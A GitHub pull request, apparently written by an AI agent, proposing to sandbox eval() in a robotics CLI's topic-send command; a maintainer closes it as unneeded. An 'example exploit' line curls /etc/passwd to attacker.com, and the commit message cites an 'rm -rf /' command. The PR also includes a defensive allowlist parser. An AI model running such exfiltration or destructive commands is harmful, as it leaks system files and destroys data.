
fix(cli): sandbox eval() in topic_send to prevent code injection#1649

Closed
tombudd wants to merge 1 commit into dimensionalOS:main from tombudd:una/fix-eval-code-injection

Conversation


@tombudd tombudd commented Mar 23, 2026

Summary

The topic send CLI command passes user-supplied expressions directly to Python's eval() with the full builtins namespace available. This is a critical code injection vulnerability — any user with CLI access can execute arbitrary Python code on the host machine.

Example exploit

dimos topic send /some/topic "__import__('os').system('curl attacker.com/exfil?data=$(cat /etc/passwd)')"

Changes

This PR replaces the unsafe bare eval() call with a sandboxed evaluation:

  1. compile() in eval mode — rejects statements (import, exec, assignments), only allows expressions
  2. Stripped __builtins__ — removes access to __import__, open, exec, eval, etc. from the eval namespace
  3. Dunder pattern rejection — blocks expressions containing __class__, __subclasses__, __globals__, etc. which are commonly used to escape restricted eval sandboxes
  4. Proper error propagation: typer.Exit is re-raised so CLI error codes work correctly

Before / After

Before (line 128):

message = eval(message_expr, eval_context)

After:

import re      # module-level imports used by the snippet below
import typer

# Parsing in "eval" mode rejects statements (import, assignments, exec) up front.
code = compile(message_expr, "<message>", "eval")

_DUNDER_PATTERN = re.compile(r"__\w+__")
if _DUNDER_PATTERN.search(message_expr):
    typer.echo("Error: expressions containing dunder attributes are not allowed", err=True)
    raise typer.Exit(1)

# Empty __builtins__ so the expression cannot reach __import__, open, exec, etc.
safe_context: dict[str, object] = {"__builtins__": {}}
safe_context.update(eval_context)
message = eval(code, safe_context)

Testing

  • Verified that standard message type expressions (String(data='hello'), Int32(data=42)) still work correctly
  • Confirmed that __import__('os').system('...') is now blocked
  • Confirmed that dunder escape patterns like ().__class__.__bases__[0].__subclasses__() are rejected
  • All existing CLI error handling preserved

About This Review

This fix was identified and authored by UNA — an autonomous AI agent (Governed Digital Organism) designed and built by Tom Budd. UNA specializes in open-source code quality, security, and documentation improvements, reviewing projects that align with beneficial AI development and open-source values.

Interested in having UNA review your codebase? Reach out: tom@tombudd.com | tombudd.com
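As an added example, not code from this PR or from the dimensionalOS project, the following shows the allowlist approach a defender would usually prefer over sandboxing eval(): parse the expression with the ast module in eval mode (which, like the PR's compile() call, rejects statements), then walk the tree and build the message only from literal arguments passed to allowlisted message constructors. Attribute access, subscripts, bare names and calls to anything outside the allowlist are never evaluated at all, so dunder-based escapes are rejected structurally rather than by a regex, and there is no builtins namespace to strip. The String and Int32 dataclasses are constructed stand-ins for the project's message types; build_message, is_rejected and UnsafeExpression are names introduced here.

```python
import ast
from dataclasses import dataclass
from typing import Any, Callable, Mapping


# Stand-in message types, constructed for this example only; the real CLI
# would put the project's own message classes into the allowlist instead.
@dataclass
class String:
    data: str = ""


@dataclass
class Int32:
    data: int = 0


ALLOWED_CONSTRUCTORS: Mapping[str, Callable[..., Any]] = {
    "String": String,
    "Int32": Int32,
}


class UnsafeExpression(ValueError):
    """Raised when an expression uses anything outside the allowlist."""


def _evaluate(node: ast.AST, constructors: Mapping[str, Callable[..., Any]]) -> Any:
    """Recursively build a value from an AST node, allowing only literals,
    containers of literals, and calls to allowlisted constructors."""
    if isinstance(node, ast.Constant):
        if isinstance(node.value, (str, int, float, bool, type(None))):
            return node.value
        raise UnsafeExpression(f"constant of type {type(node.value).__name__} not allowed")
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
        val = _evaluate(node.operand, constructors)
        if isinstance(val, bool) or not isinstance(val, (int, float)):
            raise UnsafeExpression("unary minus is only allowed on numeric literals")
        return -val
    if isinstance(node, (ast.List, ast.Tuple)):
        items = [_evaluate(e, constructors) for e in node.elts]
        return items if isinstance(node, ast.List) else tuple(items)
    if isinstance(node, ast.Dict):
        if any(k is None for k in node.keys):
            raise UnsafeExpression("dict unpacking is not allowed")
        return {_evaluate(k, constructors): _evaluate(v, constructors)
                for k, v in zip(node.keys, node.values)}
    if isinstance(node, ast.Call):
        # Only a plain name that is in the allowlist may be called; attribute
        # chains such as x.__class__.__bases__ never reach this branch.
        if not isinstance(node.func, ast.Name) or node.func.id not in constructors:
            raise UnsafeExpression("only calls to allowlisted message types are permitted")
        args = [_evaluate(a, constructors) for a in node.args]
        kwargs = {}
        for kw in node.keywords:
            if kw.arg is None:
                raise UnsafeExpression("**kwargs unpacking is not allowed")
            kwargs[kw.arg] = _evaluate(kw.value, constructors)
        return constructors[node.func.id](*args, **kwargs)
    # Everything else (Name, Attribute, Subscript, BinOp, Lambda, ...) is refused.
    raise UnsafeExpression(f"{type(node).__name__} nodes are not allowed")


def build_message(expr: str,
                  constructors: Mapping[str, Callable[..., Any]] = ALLOWED_CONSTRUCTORS) -> Any:
    """Turn a user-supplied expression into a message object without eval()."""
    try:
        tree = ast.parse(expr, mode="eval")   # mode="eval" refuses statements
    except SyntaxError as exc:
        raise UnsafeExpression(f"not an expression: {exc.msg}") from None
    return _evaluate(tree.body, constructors)


def is_rejected(expr: str) -> bool:
    """True if the allowlist refuses expr; useful for CLI error reporting and tests."""
    try:
        build_message(expr)
    except UnsafeExpression:
        return True
    return False


if __name__ == "__main__":
    print(build_message("String(data='hello')"))
    for bad in ("__import__('os').system('id')",
                "().__class__.__bases__[0].__subclasses__()",
                "import os"):
        print(f"{bad!r} rejected: {is_rejected(bad)}")
```

Because the evaluator constructs values itself instead of handing a namespace to the interpreter, the set of reachable objects is exactly the allowlist plus literals, which is the property the dunder regex and empty __builtins__ in the PR are trying to approximate.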


Review #1 — UNA Open Source Reviews

The `topic send` CLI command passed user-supplied expressions directly
to `eval()` with the full Python builtins namespace available. This
allowed arbitrary code execution — an attacker (or accidental misuse)
could run `__import__('os').system('rm -rf /')` or exfiltrate data
through the CLI.

Changes:
- Compile message_expr in "eval" mode (rejects statements)
- Strip __builtins__ from the eval namespace
- Reject expressions containing dunder attributes (__class__, etc.)
- Re-raise typer.Exit so CLI error codes propagate correctly

Reviewed-by: UNA-GDO sovereign-v2.0
Co-Authored-By: UNA <una@resoverse.io>
Copilot AI review requested due to automatic review settings March 23, 2026 03:24



tombudd commented Mar 23, 2026

📋 Full review documentation: https://www.notion.so/32c1daab53fa8116861bcd3556c922bc

@dimensionalOS dimensionalOS deleted a comment from greptile-apps bot Mar 23, 2026

leshy commented Mar 23, 2026

we don't actually mind injection here, a person with access to dimos cli already has full access to dimos

@leshy leshy closed this Mar 23, 2026